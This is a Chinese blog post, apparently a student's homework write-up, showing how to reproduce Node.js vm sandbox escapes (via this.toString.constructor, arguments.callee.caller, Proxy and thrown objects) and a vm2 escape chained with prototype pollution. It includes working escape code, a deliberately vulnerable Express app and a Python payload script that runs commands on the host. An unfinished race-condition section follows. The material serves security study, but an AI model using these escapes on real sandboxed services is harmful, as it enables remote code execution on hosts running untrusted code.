沙箱逃逸和竞争性漏洞复现

最新推荐文章于 2024-01-16 10:04:07 发布
最新推荐文章于 2024-01-16 10:04:07 发布
阅读量147 收藏
点赞数
分类专栏: 网安 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/vt_yjx/article/details/132061990
版权

目录

沙箱逃逸

        原理

        当this指向window

        当this指向null,且没有其他对象可用

              第一种触发方法

              第二种触发方法

              第三种触发方法

漏洞复现

竞争性漏洞

沙箱逃逸

        原理

        当this指向window

        1.this直接指向window,拿到window的tostring的constructor来利用构造函数拿到process

                是对象且指向沙箱外部,才可以利用

const vm = require('vm');
const script = `
const process = this.toString.constructor('return process')()
process.mainModule.require('child_process').execSync('whoami').toString()
`;
const sandbox = { m: 1, n: 2 };
const context = new vm.createContext(sandbox);
const res = vm.runInContext(script, context);
console.log(res)

        当this指向null,且没有其他对象可用

               使用arguments.callee.caller在沙盒内定义一个函数并返回,让外部对象调用这个函数,此时arguments.callee就是该对象了,然后再用constructor利用构造函数拿到process

                arguments.callee就是调用函数本身(可以理解成等于函数本身,但没有指向)

                arguments.caller就是指谁调用了自己(指向一个函数)

                arguments.callee.caller就是指向了某个调用自己的方法,这样就可以通过处在沙箱外的这个方法的构造函数拿到process了

               第一种触发方法

        此时要触发这个tostring方法,就需要沙箱外有执行字符串的相关操作,

        可以console.log('hello' + res),来利用拼接的方式让res变成一个字符串

        因为在js中,例如this、对象等和字符串拼接都会自动调用tostring方法然后变成一个字符串 

        自然就触发了tostring方法了

const vm = require('vm');
const script =`(() => {  

  const a = {}  
  
  a.toString = function () {    
  
  const cc = arguments.callee.caller;    
  
  const p = (cc.constructor('return process'))();   
  
   return p.mainModule.require('child_process').execSync('whoami').toString()  
  
  }  
  
  return a })()`;
const sandbox = { m: {}, n: 2, x: /regexp/};
const context = new vm.createContext(sandbox);
const res = vm.runInContext(script, context);
console.log('hello'+res);

                

               第二种触发方法

        用proxy来劫持所有属性,只要沙箱外使用了例如console.log(res.xxx)就会被proxy劫持,然后就会触发上述代码

const vm = require('vm');
const script =`(() => {  

  const a = new Proxy({}, { 
  
  get: function() {      
  
  const cc = arguments.callee.caller;      
  
  const p = (cc.constructor('return process'))();     
  
   return p.mainModule.require('child_process').execSync('whoami').toString()
  
  }  
  
  })    
  
  return a })()`;
const sandbox = { m: {}, n: 2, x: /regexp/};
const context = new vm.createContext(sandbox);
const res = vm.runInContext(script, context);
console.log(res.xx);
第三种触发方法

        利用异常处理,把沙箱内的对象跑出去,然后让外部捕捉异常,也可以触发

        

vm = require('vm'); 

const code5 = `throw new Proxy({}, {    

 get: function() {     

  const cc = arguments.callee.caller;      

 const p = (cc.constructor.constructor('return process'))();      

  return p.mainModule.require('child_process').execSync('whoami').toString()    

 }  

 }) `; 

try {    vm.runInContext(code5, vm.createContext(Object.create(null))); }

 catch(e)

 {    console.log('error happend: ' + e); }

漏洞复现

        import逃逸结合原型污染

1.

  条件:

        vm2版本:3.9.10以下

  源码:

const express = require('express');
const app = express();
const { VM } = require('vm2');
 
app.use(express.json());
 
const backdoor = function () {
    try {
        new VM().run({}.shellcode);
    } catch (e) {
        console.log(e);
    }
}
 
const isObject = obj => obj && obj.constructor && obj.constructor === Object;
const merge = (a, b) => {
    for (var attr in b) {
        if (isObject(a[attr]) && isObject(b[attr])) {
            merge(a[attr], b[attr]);
        } else {
            a[attr] = b[attr];
        }
    }
    return a
}
const clone = (a) => {
    return merge({}, a);
}
 
 
app.get('/', function (req, res) {
    res.send("POST some json shit to /.  no source code and try to find source code");
});
 
app.post('/', function (req, res) {
    try {
        console.log(req.body)
        var body = JSON.parse(JSON.stringify(req.body));
        var copybody = clone(body)
        if (copybody.shit) {
            backdoor()
        }
        res.send("post shit ok")
    }catch(e){
        res.send("is it shit ?")
        console.log(e)
    }
})
 
app.listen(3000, function () {
    console.log('start listening on port 3000');
});

思路:看到vm说明处在沙箱中,要逃逸出沙箱就得找到一个外部对象

        看到post提交这里,要执行backdoor函数,就要满足条件:

        要有shit,且shit值为1

        根据源码显示,body又是用户输入的,然后利用clone函数里的merge结合赋给一个空对 象,那么就可以污染空对象的原型,加上一个shit属性值为1.

        这样就能触发backdoor了

 
app.post('/', function (req, res) {
    try {
        console.log(req.body)
        var body = JSON.parse(JSON.stringify(req.body));
        var copybody = clone(body)
        if (copybody.shit) {
            backdoor()
        }
        res.send("post shit ok")
    }catch(e){
        res.send("is it shit ?")
        console.log(e)
    }
})

      现在看backdoor函数:

        空对象里有一个shellcode属性,在上面我们已经可以污染空对象的原型了,那就继续添加一个shellcode属性,值就要逃逸出沙箱了,可以使用import来动态导入对象

        注:3.9.10以后的版本已经通过将import过滤修复了

const backdoor = function () {
    try {
        new VM().run({}.shellcode);
    } catch (e) {
        console.log(e);
    }
}

利用python发送post:

import requests
import json

url = "http://127.0.0.1:3000/"

headers = {"Content-type": "application/json"}

data = {"shit": "1", "__proto__": {"shellcode": "let res = import('./app.js')\n    res.toString.constructor(\"return this\")\n    ().process.mainModule.require(\"child_process\").execSync('whoami').toString();"}}

req = requests.post(url=url, headers=headers, data=json.dumps(data))

print(req.text)

复现成功:

       

竞争性漏洞(未完成)

        环境:利用django搭建项目,参考官方文档:GitHub - cookiecutter/cookiecutter-django: Cookiecutter Django is a framework for jumpstarting production-ready Django projects quickly.

官方文档-本地配置:

Getting Up and Running Locally — Cookiecutter Django 2023.31.3 documentation

访问页面:

       登录后:

 暂时到这一步,未复现成功,先提交作业,后面做好了继续修改

vt_yjx
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
android沙箱逃逸漏洞,长达数月的努力:揭秘Project Zero团队如何发现Chrome沙箱逃逸漏洞...
weixin_42372731的博客
06-01 223
}// Remove all refs from our watched dispatchers and fire cancellations.for (auto& entry : watches) {entry.second->dispatcher()->RemoveWatcherRef(this, entry.first);entry.second->Cancel()...
NodeJS vm&vm2沙箱逃逸
leekos的博客,分享web安全相关知识~
08-05 1316
在讲沙箱逃逸之前,我们需要了解一下什么是沙箱沙箱就是一个集装箱,把你的应用装到沙箱里去运行,这样应用与应用之间就产生了边界,不会相互影响。当我们运行一些可能产生危害的程序时,我们不能直接在主机上运行。我们可以单独开辟一个运行代码的环境,这个环境就是沙箱,它与主机相互隔离,但使用主机的资源,但有危害的代码在沙箱内运行只会对沙箱内部产生一些影响,不影响主机的功能。
复现沙箱逃逸漏洞
weixin_64879549的博客
08-03 717
复现沙箱逃逸漏洞
沙箱逃逸漏洞复现
qq_52178594的博客
08-06 177
沙箱就是能够像一个集装箱一样,把你的应用“装”起来的技术。这样,应用与应用之间,就因为有了边界而不至于相互干扰而被装进集装箱的应用,也可以被方便地搬来搬去。
CVE-2022-0543(redis沙盒逃逸)详细漏洞复现
没事我溜达
03-25 8608
参考:vulhub/README.zh-cn.md at master · vulhub/vulhub · GitHub Redis Lua沙盒绕过命令执行(CVE-2022-0543) Redis是著名的开源Key-Value数据库,其具备在沙箱中执行Lua脚本的能力。 Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua沙箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸沙箱执行任意命令。 直接写复现全过程吧
逃逸IE浏览器沙箱-在野0Day漏洞利用复现
10-13
标题中的“逃逸IE浏览器沙箱-在野0Day漏洞利用复现”指的是针对Internet Explorer(IE)浏览器的安全研究,特别是关于如何利用未公开(0Day)漏洞来突破浏览器的安全沙箱机制。沙箱是一种安全措施,它限制了恶意代码...
沙箱逃逸:来自安全软件的鼎力相助.pdf
08-07
Microsoft Windows 8.1 和 Windows 10 集成了若干新的缓解措施和安全边界,显著提升了应用层沙箱安全性,降低了代码执行漏洞所造成的直接危害。然而第三方软件也是 Windows 生态系统的不可分割的一部分,用户基数...
沙箱逃逸技术总结
09-11
沙箱逃逸技术总结。
沙箱逃逸练习题python源码
02-13
里面是近十道python逃逸题目的python源码,在python环境中运行既可以进入题目环境。 可以查看我写的沙箱逃逸的博客结合练习 https://blog.csdn.net/qq_43390703/article/details/104256001
CVE-2022-0543(redis沙盒逃逸
huayimy的博客
02-03 878
CVE-2022-0543(redis沙盒逃逸借助Lua沙箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0里的导出函数luaopen_io。Redis Labs Redis是美国Redis Labs公司的一套开源的使用ANSI C编写、支持网络、可基于内存亦可持久化的日志型、键值(Key-Value)存储数据库,并提供多种语言的API。运行完docker-compose后,打开我们的redis就是我们的漏洞环境啦
ctfshow--node.js漏洞
ing_end的博客
05-14 1039
一些漏洞: 危险函数所导致的命令执行 eval() eval() 函数可计算某个字符串,并执行其中的的 JavaScript 代码。和PHP中eval函数一样,如果传递到函数中的参数可控并且没有经过严格的过滤时,就会导致漏洞的出现。 简单例子: main.js var express = require("express"); var app = express(); app.get('/eval',function(req,res){ res.send(eval(req.query.q));//通过re
如何预防 Node.js 命令注入
程序员成长指北
12-19 116
大厂技术高级前端Node进阶点击上方程序员成长指北,关注公众号 回复1,加入高级Node交流群前言Node.js和npm为前端生态中提供了统一的开发语言、强大的包管理和模块生态系统、灵活的构建工具和任务自动化、以及丰富的前端框架和库等等。可以说,正是因为nodejs带来的这些工具和资源使前端开发更加高效、便捷,并推动了前端技术的快速发展。但是近年来,Node.js 生态系统中的 npm ...
【严重】vm2 <3.9.15 沙箱逃逸漏洞(CVE-2023-29017)
murphysec的博客
04-13 1263
vm2 是一个沙箱,用于在 Node.js 环境中运行不受信任的代码。宿主对象(Host objects)是指由 Node.js 的宿主环境提供的对象,例如全局对象、文件系统或网络请求等。 vm2 3.9.15之前版本中,当处理异步错误时未正确处理 Error.prepareStackTrace 的宿主对象,攻击者可利用该漏洞绕过沙箱保护,在运行沙箱的主机上远程执行任意代码。
Python沙箱逃逸终极指南:安全漏洞分析和解决方案一网打尽
最新发布
Rocky006的博客
01-16 1459
Python 是一种强大而灵活的编程语言,但在某些情况下,可能需要运行不受信任的代码,同时又希望限制它的行为,以防止对系统的不良影响。这时,Python 沙箱就成为一种有用的工具,它可以帮助你在安全的环境中运行不受信任的代码。本文将探讨 Python 沙箱的概念、常见的沙箱技术以及如何避免沙箱逃逸
沙箱逃逸(简单实例)
m0_63596823的博客
08-02 240
this.toString.constructor获取到函数对象的构造器,构造器中可以传入字符串类型的代码。然后在执行,即可获得process对象。可以使用外部传入的对象,比如this来引入当前上下文里没有的模块,进而绕过这个隔离环境。但这个隔离环境是很容易绕过的。第二行:利用前面获取的process对象既可以干任何事。
vm2 组件存在沙箱逃逸漏洞
OSCS开源安全社区
09-07 1195
OSCS(开源软件供应链安全社区)通过最快、最全的方式,发布开源项目最新的安全风险动态,包括开源组件安全漏洞、事件等信息。同时提供漏洞、投毒情报的免费订阅服务,社区用户可通过配置飞书、钉钉、企业微信机器人,及时获得一手情报信息推送。点击漏洞详情页右下方【免费使用】,即可快速体验墨菲安全专业的检测能力。提供代码安全检测、许可证合规评估等能力,目前支持 CLI 、IDE插件、GitHub多种检测方式,欢迎使用。受影响版本的 vm2 中,攻击者可以绕过沙箱的保护,在沙箱运行的主机上获得远程代码执行的权限。
远程命令执行漏洞-mock修改
qq_44038971的博客
12-12 282
远程命令执行漏洞-mock修改
node.js--vm沙箱逃逸初探
m0_62422842的博客
01-04 2018
前几天遇到一个考察vm沙箱逃逸的题目,由于这个点是第一次听说,所以就花时间了解了解什么是沙箱逃逸。此篇文章是对于自己初学vm沙箱逃逸的学习记录,若记录知识有误,欢迎师傅们指正。就只针对于node.js而言,沙箱和docker容器其实是差不多的,都是将程序与程序之间,程序与主机之间互相分隔开,但是沙箱是为了隔离有害程序的,避免影响到主机环境。为什么node.js语言要引入沙箱,这就要说说js语言中的作用域(也叫上下文)。------->输出undefined-------->输出100。
nodejs沙箱逃逸
09-11
node.js沙箱逃逸是指攻击者利用特定的漏洞或技术手段,成功越过node.js沙箱限制,实现对主机环境的非法操作或访问。在node.js中,沙箱被用来隔离有害程序,防止其影响到主机环境。通过沙箱,可以将程序与程序之间、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值